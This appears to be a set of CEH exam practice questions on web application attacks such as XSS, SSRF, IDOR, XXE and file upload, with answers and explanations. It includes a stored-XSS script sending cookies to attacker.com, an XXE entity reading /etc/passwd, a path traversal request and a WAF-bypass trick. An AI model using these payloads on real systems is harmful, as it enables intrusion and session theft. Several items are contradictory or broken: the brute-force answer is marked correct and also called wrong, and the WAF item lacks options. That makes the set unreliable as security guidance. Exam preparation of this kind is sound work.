CEH often tests the confusion between SSRF, CSRF, and XSS — candidates see 'server makes requests' and pick CSRF because both involve the server, missing that CSRF abuses a victim's session while SSRF abuses the server's network position.
How to eliminate wrong answers
Option A is wrong because it describes Cross-Site Request Forgery (CSRF), where a victim's authenticated session is abused to perform actions. Option B is wrong because it describes Cross-Site Scripting (XSS), where malicious scripts execute in other users' browsers. Option D is wrong because it describes command injection, where user input is passed to a system shell — a different vulnerability class entirely.
A penetration tester uses Burp Suite Repeater to manually modify and resend HTTP requests to a web server. In which phase of the testing methodology is this tool most commonly employed?
A.Reconnaissance
B.Reporting
C.Exploitation
D.Scanning and enumeration
AnswerC
Exploitation involves leveraging identified vulnerabilities to achieve a specific objective, such as gaining unauthorized access, escalating privileges, or exfiltrating sensitive data. Burp Suite Repeater is an indispensable tool for this phase, allowing testers to meticulously modify request parameters, headers, or body content with crafted payloads. This precision enables the confirmation and exploitation of vulnerabilities like SQL injection, cross-site scripting, or authentication bypasses by observing the server's direct, often vulnerable, responses.
Why this answer
Burp Suite Repeater is used to manually craft and reissue requests, typically during the exploitation phase after identifying potential vulnerabilities. It allows testing parameter manipulation, injection payloads, and observing responses.
A web application allows users to upload profile images. An attacker uploads a file named 'image.php.png' with malicious PHP code, and the server executes it as PHP. Which type of vulnerability is this?
A.Directory traversal
B.Command injection
C.SQL injection
D.Unrestricted file upload
AnswerD
Unrestricted file upload is the correct answer because it directly describes the vulnerability where a web application allows users to upload files without adequately validating their type, size, or content. This critical flaw enables an attacker to upload malicious files, such as web shells or scripts, to the server. Once uploaded, these files can often be executed by the web server, leading to severe consequences like remote code execution, server compromise, or defacement.
Why this answer
The vulnerability is unrestricted file upload because the application allows an attacker to upload a file with a double extension ('image.php.png') that the server executes as PHP. This occurs when the server does not properly validate file types, extensions, or content, allowing executable code to be uploaded and run. The double extension tricks the server into treating the file as an image while the PHP interpreter executes it.
Exam trap
CEH often tests the distinction between file upload and other injection vulnerabilities — candidates may confuse the double extension trick with directory traversal or command injection.
How to eliminate wrong answers
Option A is wrong because directory traversal involves accessing files outside the intended directory using sequences like '../', which is not described here. Option B is wrong because command injection involves executing arbitrary OS commands through vulnerable input fields, not uploading a file. Option C is wrong because SQL injection involves manipulating SQL queries through input, which is unrelated to file upload functionality.
A web application firewall (WAF) blocks requests containing ' UNION SELECT '. A penetration tester wants to bypass this restriction to perform a union-based SQL injection. Which of the following techniques is MOST likely to succeed?
Inline comments, like '/**/', are valid SQL syntax that allows arbitrary text to be inserted without affecting query execution. By strategically placing these comments within keywords (e.g., 'UN/**/ION'), an attacker can break up the signature of a known malicious string (e.g., "UNION SELECT") into smaller, non-matching fragments. This technique effectively bypasses WAFs that rely on simple, exact string matching or regular expressions that do not account for such obfuscation, as the WAF sees 'UN', then '/**/', then 'ION', rather than the full "UNION" keyword.
Why this answer
Using comments or alternative encoding can bypass WAF rules. Inline comments like '/**/' can break up keywords.
A security analyst notices that a web application returns different page sizes when a valid user ID is submitted versus an invalid one in the URL parameter. Which type of vulnerability is most likely being exploited?
A.Stored Cross-Site Scripting (XSS)
B.Insecure Direct Object Reference (IDOR)
C.Cross-Site Request Forgery (CSRF)
D.SQL Injection
AnswerB
Insecure Direct Object Reference (IDOR) occurs when an application exposes a direct reference to an internal implementation object, such as a file, directory, database record, or key, and fails to implement proper authorization checks. An attacker can manipulate these references, often found in URL parameters or API requests, to access resources belonging to other users or entities without explicit permission. This directly matches the scenario where an analyst changes an ID to view different responses, indicating a bypass of access controls.
Why this answer
The different page sizes for valid versus invalid user IDs indicate an Insecure Direct Object Reference (IDOR) vulnerability, where the application exposes internal object references (like user IDs) without proper authorization checks. An attacker can manipulate the parameter to access other users' data, and the varying response size reveals whether the ID exists, enabling enumeration. This is a classic IDOR exploitation pattern.
Exam trap
CEH often tests the confusion between IDOR and other injection or scripting flaws — candidates may pick SQL injection because it involves manipulating parameters, but the telltale sign is response variation based on object validity.
How to eliminate wrong answers
Option A is wrong because stored XSS involves malicious scripts persisted on the server and executed in victims' browsers, not differences in page size based on ID validity. Option C is wrong because CSRF tricks authenticated users into performing unintended actions, and it does not typically manifest as response size variations for different IDs. Option D is wrong because SQL injection would likely cause database errors or unexpected data retrieval, but the specific behavior of different page sizes for valid/invalid IDs is more indicative of IDOR enumeration than SQLi.
A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?
Select 3 answers
A.SQL injection
B.Arbitrary file read on the server
C.Denial of Service (DoS)
D.Server-Side Request Forgery (SSRF)
E.Remote code execution via command injection
AnswersB, C, D
XXE vulnerabilities allow an attacker to define external entities that reference local files on the server using the `file://` URI scheme. When the XML parser processes this entity, it attempts to retrieve the content of the specified file, such as `/etc/passwd` or application configuration files. This content is then embedded into the XML response, enabling the attacker to read sensitive system files.
Why this answer
Option B (Arbitrary file read on the server) is correct because XXE payloads can define an external entity whose SYSTEM identifier points to a local file (e.g., <!ENTITY xxe SYSTEM "file:///etc/passwd">), causing the parser to embed the file's contents in the response. Option C (Denial of Service) is correct because entities can be nested or recursively referenced (the 'billion laughs' attack) or point to large/blocking resources, exhausting parser memory or CPU and rendering the service unavailable. Option D (Server-Side Request Forgery) is correct because an external entity with an HTTP/FTP SYSTEM URL forces the vulnerable server to make outbound requests to internal or external hosts, enabling SSRF and potential access to internal services or cloud metadata endpoints.
Option A (SQL injection) is not a direct XXE impact — XXE abuses the XML parser, not a database query interface, so any SQLi would be a separate vulnerability. Option E (Remote code execution via command injection) is not a standard XXE consequence; XXE does not invoke OS commands, and RCE typically requires additional flaws such as insecure deserialization or PHP expect:// wrappers in specific misconfigurations.
Exam trap
The trap is selecting SQL injection or RCE because they are 'impactful' — candidates must remember XXE's direct impacts are file read, SSRF, and DoS, not SQLi or command injection.
Which of the following is the BEST defense against brute-force attacks on a login form?
A.Rate limiting on the login endpoint
B.CAPTCHA
C.Complex password policy
D.Account lockout after 5 failed attempts
AnswerD
Account lockout after 5 failed attempts can be circumvented by distributed attacks from many IPs. It is reactive and may cause denial of service for legitimate users, so it is not the best.
Why this answer
Account lockout after a small number of failed attempts (D) is the most direct and effective defense against brute-force attacks on a login form: it stops the attack at the source by disabling the targeted account after repeated failures, regardless of source IP. Rate limiting (A) is a useful complementary control, but it can be bypassed by distributing attempts across many IPs and does not stop slow, low-rate brute-force attempts. CAPTCHA (B) can be bypassed by automated solvers, and complex password policies (C) do not prevent repeated attempts.
Therefore the BEST answer is D.
Exam trap
The question uses the word 'BEST' to indicate a single correct answer. Do not assume multiple answers are correct. Account lockout is the most direct defense because it halts repeated failed attempts against the targeted account, while rate limiting can be evaded via distributed or low-rate attacks.
How to eliminate wrong answers
Option B (CAPTCHA) is wrong because while it can slow down automated attacks, it is not the best defense as it can be bypassed using OCR, machine learning, or third-party solving services, and it degrades user experience. Option C (Complex password policy) is wrong because it only increases the password search space but does not prevent brute-force attempts; attackers can still try millions of combinations over time. Option D (Account lockout after 5 failed attempts) is wrong because it is a reactive measure that can be exploited for denial-of-service attacks against legitimate users, and attackers can bypass it by using many different usernames or IP addresses in a distributed brute-force attack.
A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)
Select 2 answers
A.Directory traversal
B.Remote file inclusion (RFI)
C.SQL injection
D.Local file inclusion (LFI)
E.Command injection
AnswersA, D
Directory traversal, also known as path traversal, is an attack that exploits insufficient security validation or sanitization of user-supplied input to access files and directories stored outside the intended web root directory. The `../` sequence, or its URL-encoded equivalent `%2e%2e%2f`, allows an attacker to navigate up the directory hierarchy. By chaining multiple `../` sequences, an attacker can potentially access sensitive system files like `/etc/passwd` or configuration files, thereby compromising the system's confidentiality.
Why this answer
Option A (Directory traversal) is correct because the payload ../../../etc/passwd uses dot-dot-slash sequences to escape the web root and reference files outside the intended directory, which is the classic signature of a path traversal attack. Option D (Local file inclusion) is correct because the same traversal sequence is being passed to the file parameter to make the application include a local server-side file such as /etc/passwd, a hallmark of LFI attempts. Option B (RFI) is not indicated because the value references a local path rather than a remote URL or protocol such as http:// or ftp://.
Option C (SQL injection) is not indicated because there are no SQL metacharacters, quotes, or query fragments in the payload. Option E (Command injection) is not indicated because no shell operators or system commands (e.g., ;, |, &&, whoami) appear in the request.
Exam trap
CEH often tests the overlap between directory traversal and LFI — candidates frequently pick RFI because they see 'file=' and assume remote inclusion, but the payload's local path (`/etc/passwd`) rules RFI out.
A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?
A.Cross-Site Scripting (XSS)
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.SQL injection
AnswerA
If a web application reflects unsanitized user-controlled input, such as the User-Agent HTTP header, directly into the HTML response, it creates a reflected Cross-Site Scripting (XSS) vulnerability. An attacker can inject malicious client-side scripts (e.g., JavaScript) into the User-Agent string. When another user's browser renders this page, the injected script executes within their browser's security context, potentially leading to session hijacking, defacement, or redirection.
Why this answer
Reflecting unsanitized input in HTTP headers can lead to reflected XSS.
An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?
A.Using a list of compromised credentials from a data breach
B.Trying many passwords for a single account
C.Trying a few common passwords against many accounts
D.Using automated tools to bypass CAPTCHA
AnswerC
This is the precise definition of a password spraying attack. Attackers employ this technique by taking a small list of commonly used passwords (e.g., 'Password123', 'Summer2023!') and attempting each of these passwords against a large number of different user accounts within the same system. The primary goal is to avoid triggering account lockout thresholds, which are typically set per-account, by only attempting one or two passwords per user before moving on to the next account.
Why this answer
Password spraying uses a few common passwords against many accounts to avoid account lockout.
During a web application assessment, a tester notices that a page reflects the value of a query parameter directly into the HTML response body without encoding, and the reflected value executes script in the browser when the crafted link is opened. Which of the following most accurately describes this vulnerability?
A.DOM-based cross-site scripting, because the payload is processed entirely within the client-side JavaScript.
B.Reflected cross-site scripting, because the injected script is returned in the immediate response to the crafted request.
C.Cross-site request forgery, because the crafted link causes the victim's browser to issue an unintended request.
D.Stored cross-site scripting, because the payload persists on the server and is served to other users.
AnswerB
Reflected XSS occurs when user input is included in the response to the same request without proper output encoding, causing the browser to execute it. The tester's observation that the parameter is echoed back and executes when the crafted link is opened is the defining characteristic of this type.
Why this answer
The defining feature is that unencoded user input is reflected in the immediate HTTP response and executes in the browser, which is reflected cross-site scripting. Stored XSS would require persistence, DOM-based XSS would originate in client-side JavaScript, and CSRF concerns forged state-changing requests rather than script execution.
Exam trap
The trap here is conflating any script execution in the browser with stored or DOM-based XSS, when the immediate server reflection of the parameter is what determines the reflected classification.
Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?
A.SQLMap
B.Nmap
C.Burp Suite
D.John the Ripper
AnswerA
SQLMap automates SQL injection exploitation and database fingerprinting, satisfying the stem's requirement for both capabilities in one tool. It detects injection points, identifies the backend database management system, and extracts data through techniques such as boolean-blind, time-blind, error-based and union-based injection, removing the need for manual payload crafting during penetration tests.
Why this answer
SQLMap is an open-source penetration testing tool specifically designed to automate the detection and exploitation of SQL injection flaws and database server fingerprinting. It supports a wide range of database management systems (MySQL, Oracle, PostgreSQL, Microsoft SQL Server, etc.) and can automate tasks such as retrieving data, accessing the file system, and executing commands. Its core purpose aligns exactly with automated SQL injection exploitation and database fingerprinting.
Exam trap
CEH often tests the confusion between general-purpose web proxies/scanners (like Burp Suite) and specialized exploitation tools (like SQLMap), so candidates must remember that SQLMap is the dedicated tool for automated SQL injection and database fingerprinting.
How to eliminate wrong answers
Option B is wrong because Nmap is a network discovery and port scanning tool used for host discovery, service version detection, and OS fingerprinting, not for SQL injection or database-specific exploitation. Option C is wrong because Burp Suite is an integrated web application security testing platform that includes a proxy, scanner, and intruder, but it does not specialize in automated SQL injection exploitation or database fingerprinting; while it can detect some SQLi, it lacks the deep exploitation and database enumeration capabilities of SQLMap. Option D is wrong because John the Ripper is a password cracking tool that uses dictionary, brute-force, and rule-based attacks against password hashes, and has no functionality for SQL injection or database fingerprinting.
In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?
A.Repeater
B.Proxy
C.Scanner
D.Intruder
AnswerA
The Repeater tool in Burp Suite is specifically designed for manually modifying and reissuing individual HTTP requests. It allows security testers to fine-tune request parameters, headers, or body content and observe the server's response in real-time. This iterative process is crucial for exploring application logic, testing for specific vulnerabilities, or confirming exploit conditions step-by-step.
Why this answer
Burp Repeater is designed for manually crafting and resending requests to see individual responses, ideal for testing parameter handling.
During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)
Select 3 answers
A.Directory traversal
B.Credential stuffing
C.Brute-force attack
D.SQL injection
E.Password spraying
AnswersB, C, E
Credential stuffing is a highly effective attack where threat actors automate login attempts using large lists of username and password pairs previously compromised in data breaches from other services. If the web application allows valid usernames to be tested against these breached password lists without adequate detection or rate limiting, it becomes vulnerable to users who reuse their credentials across multiple platforms. This leverages the common user habit of password reuse.
Why this answer
With username enumeration and no rate limiting, brute force (trying many passwords on one user), credential stuffing (using breached credentials), and password spraying (trying common passwords across many users) are all viable. SQL injection is not directly related to the described conditions.
After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?
A.Credential stuffing
B.Brute force attack
C.Password spraying
D.Dictionary attack
AnswerC
Password spraying is a sophisticated attack technique where a small number of very common passwords are systematically tried against a *large number of different user accounts* or a single account from *many different IP addresses*. This method is specifically designed to evade account lockout thresholds by distributing attempts across many targets or sources, preventing any single account or IP from exceeding the lockout limit. The 'repeated login attempts' observed in logs align perfectly with this strategy, as attackers aim to find weak passwords without triggering immediate detection.
Why this answer
Password spraying uses a small set of common passwords against many accounts or, as in this case, against a single account from multiple IPs to avoid lockout.
A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?
A.Reflected Cross-Site Scripting (XSS)
B.Command Injection
C.Cross-Site Request Forgery (CSRF)
D.Insecure Direct Object Reference (IDOR)
AnswerD
Insecure Direct Object Reference (IDOR) occurs when an application exposes a direct reference to an internal implementation object, such as a file, database key, or directory, and fails to implement proper authorization checks. An attacker can manipulate these references, often found in URL parameters, form fields, or API requests, to access or modify resources belonging to other users or unauthorized data. This vulnerability directly exploits the application's trust in user-supplied object identifiers without verifying the user's permission to access that specific object, leading to unauthorized information disclosure or modification.
Why this answer
The vulnerability is Insecure Direct Object Reference (IDOR), which occurs when an application exposes a direct reference to an internal object, such as a user ID in a URL, without verifying that the requester is authorized to access that object. By changing 'id=123' to another value, the analyst accesses another user's profile because the application trusts the client-supplied identifier. This is a classic access control flaw, not an injection or scripting issue.
Exam trap
CEH often tests whether candidates can distinguish IDOR (manipulating an object reference to bypass authorization) from XSS, CSRF, and command injection, which involve scripting, request forgery, or command execution respectively.
How to eliminate wrong answers
Option A is wrong because reflected XSS involves injecting script that executes in the victim's browser, not manipulating an object reference to access another user's data. Option B is wrong because command injection involves injecting OS commands through unsanitized input to execute on the server, which is not what changing an ID parameter does. Option C is wrong because CSRF tricks an authenticated user's browser into sending an unwanted request; here the analyst is directly modifying a parameter, not forging a request via another user's session.
A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?
A.Reflected XSS
B.Cross-site request forgery (CSRF)
C.DOM-based XSS
D.Stored XSS
AnswerD
Stored XSS, also known as persistent XSS, occurs when a malicious script is permanently saved on the target server, typically within a database, comment section, or user profile. When a victim's browser requests the page containing this stored payload, the server retrieves the malicious script and delivers it as part of the legitimate web page content. Consequently, the victim's browser executes the script, allowing the attacker to steal cookies, deface the website, or redirect users, making it a highly impactful and widespread attack.
Why this answer
The script is stored on the server (feedback) and executed when the admin views the page. This is persistent (stored) XSS.
Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)
Select 2 answers
A.The attack is typically delivered through a crafted link
B.The script executes in the server-side context
C.The attack affects all users who visit the compromised page without any interaction
D.The malicious script is reflected off the web server in the response
E.The malicious script is permanently stored on the server
AnswersA, D
Reflected Cross-Site Scripting (XSS) attacks are typically initiated when an attacker crafts a malicious URL containing the injected script and then tricks a victim into clicking it. This delivery mechanism is crucial because the malicious payload is not persistently stored on the server. Instead, the victim's browser sends the crafted URL to the vulnerable web application, which then reflects the script back in the immediate HTTP response, executing it in the victim's browser context.
Why this answer
Reflected XSS requires user interaction (clicking a link) and does not persist on the server.
An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?
A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.Blind XSS
AnswerB
Reflected Cross-Site Scripting (XSS) occurs when a malicious script, typically injected through a URL parameter or form input, is immediately processed by the server and returned within the HTTP response to the user's browser without proper sanitization. The script is not stored on the server; instead, it "reflects" off the server back to the user who made the request. The web server log showing the script directly in the request and implying an immediate response aligns perfectly with this non-persistent, server-side reflection mechanism.
Why this answer
The payload appears in the URL query string and is immediately echoed back in the response inside a <div> without sanitization. This is the classic signature of reflected XSS: the malicious script is not stored on the server but is reflected from the request to the response, executing in the victim's browser when they click a crafted link. The single request/response cycle in the log confirms it is not stored.
Exam trap
The trap is distinguishing reflected from DOM-based XSS — candidates see a script in a URL and assume DOM-based, but the presence of the payload in the server's HTTP response confirms reflected XSS.
How to eliminate wrong answers
Option A is wrong because stored XSS requires the payload to be persisted (e.g., in a database or comment field) and served to later visitors — here the script comes from the query string, not storage. Option C is wrong because DOM-based XSS occurs entirely client-side when JavaScript reads a source (like location.hash) and writes it to a sink (like innerHTML) without server involvement; this log shows the server reflecting the payload in HTML, so it is server-side reflected XSS. Option D is wrong because blind XSS is a stored variant where the payload executes in a different context (e.g., an admin panel) that the attacker cannot see; there is no evidence of deferred execution here.
An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?
A.CSRF
B.XXE
C.SSRF
D.IDOR
AnswerC
Server-Side Request Forgery (SSRF) occurs when a web application is tricked into making requests to an arbitrary domain specified by an attacker. This vulnerability allows an attacker to induce the server-side application to make HTTP requests to an attacker-specified location, potentially targeting internal networks, cloud metadata services, or other external systems. The server acts as a proxy for the attacker, bypassing network segmentation or firewall rules that might otherwise block direct access.
Why this answer
SSRF (Server-Side Request Forgery) occurs when an attacker can induce the server to make requests to internal resources.